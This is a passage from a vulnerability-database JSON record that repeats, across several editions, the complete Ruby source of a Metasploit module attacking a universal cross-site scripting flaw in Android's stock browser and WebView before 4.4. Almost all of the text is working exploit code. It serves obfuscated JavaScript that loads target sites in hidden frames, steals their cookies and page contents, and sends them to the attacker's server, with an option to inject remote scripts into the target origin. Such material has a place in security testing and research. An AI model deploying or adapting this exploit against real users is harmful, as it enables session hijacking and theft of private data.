of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2017-10-27T01:39:40", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-19T04:01:20", "history": [], "viewCount": 55, "enchantments": {"score": {"value": null, "modified": "2018-01-19T04:01:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-19T04:01:20", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-19T06:02:43", "history": [], "viewCount": 55, "enchantments": {"score": {"value": null, "modified": "2018-01-19T06:02:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-19T06:02:43", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T06:02:24", "history": [], "viewCount": 55, "enchantments": {"score": {"value": null, "modified": "2018-01-20T06:02:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-20T06:02:24", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-01-20T08:01:52", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-01-20T08:01:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-01-20T08:01:52", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-26T08:57:12", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-02-26T08:57:12"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-02-26T08:57:12", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
